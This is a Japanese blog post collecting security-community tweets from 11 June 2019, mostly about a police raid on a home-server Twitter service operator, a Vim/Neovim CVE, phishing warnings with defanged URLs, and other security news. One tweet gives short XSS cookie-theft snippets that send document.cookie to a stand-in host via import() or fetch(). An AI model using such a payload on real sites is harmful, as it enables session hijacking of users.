2019年6月11日のtwitterセキュリティクラスタ

自宅サーバーでTwitter連携サービスを運営してたら神奈川県警に家宅捜索されたそうですよ

どこの神奈川県警だよって見に行ったら案の定神奈川県警で納得感しかなかった|自宅サーバーでTwitter連携サービスを運営してたら家宅捜索された件 qiita.com/204504bySE/ite… #Qiita

警察はいつになったらまともなIT知識を学習させるようになるのだろう。現状あまりに程度が低く、善意の第三者に迷惑を掛けているだけの状態で、悪意をもった人間はやりたい放題になっている。 / “自宅サーバーでTwitter連携サービスを運営してたら家宅捜索された件 – Qiita” htn.to/FC5tUWtVEd

Twitterで画像転載を見つけるWebサービスを運営していたら、それを利用した別のユーザーの犯罪行為だと分からずに神奈川県警が誤解したままやってきたのか……

自宅サーバーでTwitter連携サービスを運営してたら家宅捜索された件 – Qiita qiita.com/204504bySE/ite…

逆に「なぜ神奈川県警はサイバー犯罪捜査に関してこんだけ素人なの?」という理由が知りたくなった。(愛知県警も兵庫県警も似たような前例あるから、神奈川に限った話では無いのかもしれないけど)

犯人がモロ画像を投稿したときの服を探していたということは、モロに見えていたモノとやらが犯人のものと違うことを警察に見せて証明さえすれば良いのではなかろうか? / “自宅サーバーでTwitter連携サービスを運営してたら家宅捜索された件 – Qiita” htn.to/2FiRo1EJRm

ダメだ、神奈川県警。ITのスキルセットがマジでリアル厨房以下。このレベルが日本標準なら、現在日本ではプロのブラックハットが絡んだガチモノのIT犯罪は高確率で完全犯罪になることを意味する。

自宅サーバーでTwitter連携サービスを運営してたら家宅捜索された件 qiita.com/204504bySE/ite… #Qiita

この件、調べたらますますわからなくなった。このTwitter連携サービスのTwiGaTenは画像をキャッシュして提供するらしく、わいせつ物である画像がキャッシュされて自宅から提供されたとすると、警察が提供元である自宅を操作するのは妥当・・・だと一瞬思いかけたが(続く)
qiita.com/204504bySE/ite…

警察は単なるサービス利用者のうちの1ユーザーであると誤解しているというのが解せん。あるアカウントがURLをTwitterに投稿したとして、そのURLの提供元の管理までしていると警察が思い込んだという完全に分けのわからないことになるぞ

そしてあるURLをホストしている住所を突き止めたとして、スマフォのみ捜索するのも意味不明。スマフォがサーバーのわけないだろうが。

神奈川県警は科学と魔法の区別がついていないとしか思えない。

これは恐ろしいな… / “自宅サーバーでTwitter連携サービスを運営してたら家宅捜索された件 – Qiita” htn.to/3PhCGacc6J

どこかのメディアが取材してくれないかな。弁護士ドットコムさんとか、いかがですか? twitter.com/ockeghem/statu…

@ockeghem (弁護士ドットコムニュース編集部の記者には伝えておきました……!)

踏み込む前にもーちょっと調べたら?ってのはあるけど、踏み込んで違った、ごめんなさいというのは仕方ないのでは?自宅でサーバーを運営していると諸々面倒なのでクラウドの海外インスタンスに置く人が増えるかも / “自宅サーバーでTwitter連携サービスを運営してたら家宅…” htn.to/x4dyvJ7Q3d

その他に気になったことはこのあたり。

またモードライン周りで Vim と Neovim に脆弱性が見つかってる.:source! でサンドボックスを迂回できるらしい.Vim 8.1.1356 と Neovim 0.3.6 で修正済みなのでアップデート推奨 | ‘CVE-2019-12735’ nvd.nist.gov/vuln/detail/CV…

はてなブログに投稿しました #はてなブログ
ジュニアーオンラインショップからのカード情報漏洩 – Fox on Security
foxsecurity.hatenablog.com/entry/2019/06/…

#ssmjp#shibuyaxssbecks.io Japanは、EC-Council CEHのECEクレジットにカウントできましたよ!ということをまとめてみた。今後も増やしていく。 satob.hatenablog.com/entry/2019/06/…

「お客様がご利用のdカードが不正利用の可能性があります。本人認証設定をお願いします。」というSMSが、湯堂先を変えながら連日ばらまかれています。偽サイトに誘導しクレカ情報を詐取するのでご注意ください。今日は目新しい誘導先 www.d-cardjp[.]com が絶賛営業中です。twitter.com/LEVO_0005/stat…

Subdomain Takeover through External Services – Aj Dumanhug – Medium medium.com/@ajdumanhug/su… desk.comにおけるsubdomain takeover事例

トレーニング中止のお知らせ
本年のCODE BLUEで実施を予定したトレーニングにつきまして、諸般の事情により中止させていただくこととなりました。
参加をご検討していた皆さまへはご迷惑をおかけいたしますことをお詫び申し上げます。何卒ご理解のほどよろしくお願いいたします。

件名:【重要】楽天株式会社から緊急のご連絡
というフィッシングメールが出回っているようです。ご注意ください。

URL→hxxp://redirect-support-rakuten[.]com/

URL→hxxp://account-recovery-support-rakuten[.]com/ticks?_ss=&tsdd=21&man=his

#Phishing @RakutenCard @RakutenJP pic.twitter.com/D3OyJOSFjT

こういうメールが来てクリックしそうになったが、宛先が複数なのであれ?ってなって、差出人で検索したらフィッシング詐欺でいっぱい出てきたので、クリックしないでよかった、ってなってる。

見た目はかなり本物っぽいので要注意です!! pic.twitter.com/IPPGrGmsPe

本件について、電気通信大学情報基盤センター(@itc_uec )から注意喚起がでています。

【2019/6/11 17:50】楽天市場を騙る詐欺メールに関する注意喚起
cc.uec.ac.jp/blogs/news/201… pic.twitter.com/hY6P0IqfTb

import実装進んでCookie盗むときのコード例が import(`//exampe.jp/?${document.cookie}`) で済むの短くて楽だ。

fetch(`//example.jp/?${document.cookie)}`) // こっちのが1文字短いか。

はてなブログに応募課題を晒しました #はてなブログ #seccamp #seccamp2019
セキュリティキャンプ全国大会2019の選考(OS開発ゼミ)を通過した話 – Yの技術ブログ
y-chan.hatenablog.jp/entry/2019/06/…

BurpJSLinkFinder: Burp Extension for a passive scanning JS files for endpoint links.
github.com/InitRoot/BurpJ… pic.twitter.com/Q4s5dIvaYc

A10ネットワークス、DDoS対策で機械学習によるゼロデイ自動保護を追加 japan.zdnet.com/article/351383…

Windowsではパスワードの定期的な再設定は不要–MSがガイドラインの改定へ japan.zdnet.com/article/351381…

個人情報漏えいインシデント、2018年は560万人以上が被害に JNSA調査速報版  internet.watch.impress.co.jp/docs/news/1189… pic.twitter.com/8dY5tPW2cx

自宅セキュリティ研究所

自宅セキュリティ研究所 wrote 2714 posts

Tags

Post navigation


コメントを残す

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes:

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>